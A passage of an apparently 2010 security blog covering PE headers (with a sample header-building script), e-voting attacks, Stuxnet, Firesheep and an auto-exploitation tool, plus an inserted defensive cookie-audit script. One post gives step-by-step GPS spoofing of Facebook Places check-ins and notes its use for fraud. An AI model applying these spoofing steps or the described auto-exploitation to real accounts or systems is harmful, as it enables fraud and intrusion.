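    return problems

def build_sample_pe(entry_rva=0x1000):
    """Constructed PE32 image: 600h bytes, headers in the first 200h, .text at 200h, .data at 400h."""
    img = bytearray(0x600)
    img[0:2] = DOS_MAGIC
    struct.pack_into("<I", img, 60, 0x80)                # e_lfanew: PE header at 80h
    img[0x80:0x84] = PE_SIG
    struct.pack_into("<HHIIIHH", img, 0x84, 0x14C, 2, 0, 0, 0, 224, 0x0102)  # i386, 2 sections, 224-byte OptionalHeader
    opt = 0x84 + 20
    struct.pack_into("<H", img, opt, 0x10B)              # PE32 magic
    struct.pack_into("<I", img, opt + 16, entry_rva)     # AddressOfEntryPoint (RVA); 1000h is inside .text
    struct.pack_into("<III", img, opt + 28, 0x400000, 0x1000, 0x200)  # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", img, opt + 56, 0x3000, 0x200)             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", img, opt + 92, 16)            # NumberOfRvaAndSizes
    sec = opt + 224
    struct.pack_into(SECTION_HDR, img, sec, b".text", 0x10, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    struct.pack_into(SECTION_HDR, img, sec + 40, b".data", 0x10, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xC0000040)
    return bytes(img)
```

With the sample image `check_layout` returns nothing, the entry point maps to file offset 200h and to virtual address 401000h once ImageBase is added; `build_sample_pe(entry_rva=0x2000)` moves the entry into the non-executable .data section, the kind of inconsistency that shows up when a header has been rewritten by hand, and the check reports it.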

Summing up the whole PE header structure in a nutshell:

Alright, this was a short description of the much more complex Windows PE header. I believe this is what everybody (of course I am not talking about grandma, but security skilled guys) should know about Windows PE. Obviously, when you need to deal with the PE header to attack or reverse engineer a binary, this information is not enough, so I suggest looking into the most authoritative guides: this, this and this.

## Tuesday, November 30, 2010

### Telecom Working Capital !

Working Capital 2010, Rome (Italy). I will be there! Live streaming from here.

## Friday, November 26, 2010

### David Bismark: E-voting without fraud

Brilliant talk on e-voting "without fraud".
It seems he is talking about Scantegrity or another Software Independent voting system (great article from NIST).

But there are many different ways to attack a (verifiable) system like that. For example, a great way to attack the system is to attack the feedback chain back to the voter. Let me try with an example:
Voter A votes for OBM. Poll-worker P scans A's ballot and destroys it. A keeps the "receipt" and later will be able to verify it through a dedicated service (Check Phase in the following image).

Assume that everything goes well: the real vote goes to the tally servers and is really counted (with anonymity properties). The attacker may attack the feedback service, showing A a wrong feedback. Now A believes that something went wrong, since the code on his receipt does not match the one shown by the feedback service. Everything actually went well, but A believes that something went wrong. This is a reputation attack: by modifying the feedback chain the attacker makes the voters believe something false.

Making the voters believe that the voting process has been compromised is equivalent to really compromising the system: the result and the consequences are the same.

## Wednesday, November 24, 2010

### Spoofing Geolocations on Facebook Places

Folks,
this easy trick is really funny :). I can imagine a lot of frauds thanks to such a trick. Don't forget that in some countries Facebook helps the police investigate crimes. Being able to prove your presence in a place other than the one you have really been in is really dangerous.

I definitely like Facebook as a company, but I think they need a little "security reinforcement" :).

BlackBerry simulator allows you to tweak the GPS to any location on the planet, and the applications on the device respond as such. Of course this is just to test out applications, but why nobody has used it on Facebook Places before is beyond me. But then again, Facebook Places has only been out for the BlackBerry this past week, so it's not much time to really click on to this sort of thing. By editing the GPS location through Simulate > Add > then editing the Name, Latitude and Longitude, which you can get by enabling the LatLong tool on Google Maps Labs, you can spoof your Facebook Places into thinking you're in one place when you're not. Always add more than 7 satellites though as this makes the device think you are in a more accurate location than it is.

## Monday, November 22, 2010

### Stuxnet Malware.

Folks, this is one of the most interesting malware samples I've ever seen: Stuxnet, which reprograms industrial control systems. Its final goal is to reprogram industrial control systems (ICS) by modifying code on programmable logic controllers (PLCs) to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment. In order to achieve this goal the creators amassed a vast array of components to increase their chances of success. Thanks to Symantec for the great report on it!

Good Job guys !

## Wednesday, November 17, 2010

### Body Scanner Pic Gallery

Sooner or later this would happen: the Feds accidentally saved body scan images. I didn't speak with Bruce Schneier, but I am pretty sure he would have laughed. This seems so obvious to me... but anyway, let's see what happened.

TSA has said over and over again that the body imagers used for security purposes are unable to store, export or print images of passengers. But this week the U.S. Marshals Service admitted that it had accidentally saved tens of thousands of images recorded on a machine used at a security checkpoint in a Florida courthouse. According to this article on CNET:

"William Bordley, an associate general counsel with the Marshals Service, acknowledged in the letter that 'approximately 35,314 images...have been stored on the Brijot Gen2 machine' used in the Orlando, Fla. federal courthouse. In addition, Bordley wrote, a Millivision machine was tested in the Washington, D.C. federal courthouse but it was sent back to the manufacturer, which now apparently possesses the image database."

## Sunday, November 14, 2010

### Text2Bib

Hi folks,
this month is going to be very very busy for me, a lot of writing, reviewing and teaching. Today, finding 5 free minutes, I want to point out a really useful tool called text2bib. Text2Bib converts a plain text list of references in any style to BibTeX ... well, in almost any style. Minimal requirements:

1) Either references are separated by blank lines or each line is a separate reference or each reference starts with \bibitem{}, \bibitem{

## Friday, November 5, 2010

### Iphone V.S Android V.S BlackBerry

Folks, I believe this is a self-explanatory brochure... (click on the pic to zoom)

## Thursday, November 4, 2010

### Windows AutoPWN a sweet first step

Hi folks,
today I want to point out Windows AutoPWN. The goal of the tool is pretty clear:
Autohack your targets with least possible interaction.

Windows AutoPWN was born to automate the exploitation of Windows platforms. It works pretty well: you just need to enter the target IP (or host name) and the local IP (or host name); after that only some optional fields such as CMS path, PHP remote shell, FTP username and proxy. Click on the WINAUTOPWN button and everything is done.

The basic concept behind this tool is the same as the Metasploit auto-exploit plugin. Basically it performs a port scan with service queries enabled; this lets the program discover which service hides behind each port number. Once the program knows what services are installed on the machine, it tries all the possible exploits for the specific ports, one by one. Of course this procedure is not smart at all, it is time and resource consuming, but it is totally automatic. If a launched exploit succeeds, the program automatically spawns a reverse TCP shell to the attacker, giving shell control over the victim.

Again, this is not clever; in fact, if you try to use this technique in a real hacking scenario you will probably be caught by IDS/IPS or anti-malware behavior analysis tools. On the other hand it is perfect as the first step of a penetration test.

## Sunday, October 31, 2010

Folks, today I suggest this interesting reading entitled: E-voting: How secure is it?

"One of the great fears in an internet election is that you are exposing our votes to manipulation by foreign powers," said Jefferson. "I just consider this to be a major national security risk; a totally unnecessary, needless risk and it's shocking to me that election officials turn away from this. They don't want to hear it, and they certainly don't want to do anything about it."

Short, incisive and clear. Take a look.

## Friday, October 29, 2010

### The Nerdest Clock I Have Ever Seen !

Folks,
how funny is this clock? Round(p) made me laugh for hours :D !!

## Thursday, October 28, 2010

### Firesheep, amazing simplicity.

Probably everybody already knows what Firesheep is. Announced at Toorcon 12, it is a session sniffer and hijacker Firefox plugin.

If you are a "hard-core" hacker you are probably thinking: "WTF is that? Where is the innovation in a freaking session sniffer and/or hijacker?". Well, I say nothing. It is nothing new per se, but it is easy, extremely easy to use. With this well done tool everybody will be able to hijack sessions carried over plain HTTP traffic. So yes, nothing new, but it is a really really well done nothing new. Before Firesheep the probability of having a hijacker in the internet point down your street was pretty low; now it is going to be pretty high. I won't say that SSL encryption is enough to prevent this attack, I won't say that you need to pay attention to certificate spoofing and to HTTPS-splitting techniques, I just want to point out that we've reached the feasibility threshold one more time.

Now it's time to build new security weapons....
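The exposure Firesheep relies on, seen from the server side, as an added Python example that is not part of the post and not Firesheep's code: a session cookie issued without the Secure attribute is also sent on plain HTTP connections, where anyone on the same network can read and replay it, and a site that does not send Strict-Transport-Security leaves the door open to the HTTPS-splitting (downgrade) technique the post mentions. The two HTTP responses are constructed samples; the "looks like a session cookie" name heuristic is an assumption of this example.

```python
# Added example, not from the post: a defender-side audit of one HTTP response for the
# weakness Firesheep exploits. Responses below are constructed samples; SESSION_HINTS
# is an assumed naming heuristic for cookies that carry a login session.

SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


def parse_set_cookies(response):
    """Return [(cookie_name, {attribute: value})] for every Set-Cookie header of a raw response."""
    cookies = []
    for line in response.split("\r\n\r\n", 1)[0].split("\r\n"):
        if not line.lower().startswith("set-cookie:"):
            continue
        parts = [p.strip() for p in line.split(":", 1)[1].split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {}
        for attr in parts[1:]:
            key, _, value = attr.partition("=")
            attrs[key.lower()] = value      # flag attributes such as Secure have an empty value
        cookies.append((name, attrs))
    return cookies


def audit_response(response):
    """Findings about session cookies and transport policy; an empty list means nothing to report."""
    findings = []
    headers = response.split("\r\n\r\n", 1)[0].split("\r\n")
    for name, attrs in parse_set_cookies(response):
        if not any(hint in name.lower() for hint in SESSION_HINTS):
            continue                        # only cookies that look like a session are in scope
        if "secure" not in attrs:
            findings.append("%s: no Secure flag, the cookie is also sent over plain HTTP" % name)
    if not any(h.lower().startswith("strict-transport-security:") for h in headers):
        findings.append("no Strict-Transport-Security header, HTTPS can be stripped down to HTTP")
    return findings


# Constructed sample responses: the weak one is what a sniffer on an open network hopes for.
WEAK = ("HTTP/1.1 200 OK\r\n"
        "Set-Cookie: sessionid=c0ffee; Path=/\r\n"
        "Content-Type: text/html\r\n\r\n<html>")
HARDENED = ("HTTP/1.1 200 OK\r\n"
            "Set-Cookie: sessionid=c0ffee; Path=/; Secure; HttpOnly\r\n"
            "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
            "Content-Type: text/html\r\n\r\n<html>")

if __name__ == "__main__":
    for label, resp in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_response(resp) or ["ok"])
```

The check is deliberately narrow: it looks only at what the server hands out, which is the part a site owner controls, and it does not claim that a Secure cookie plus HSTS closes every avenue the post lists (certificate spoofing is a separate problem).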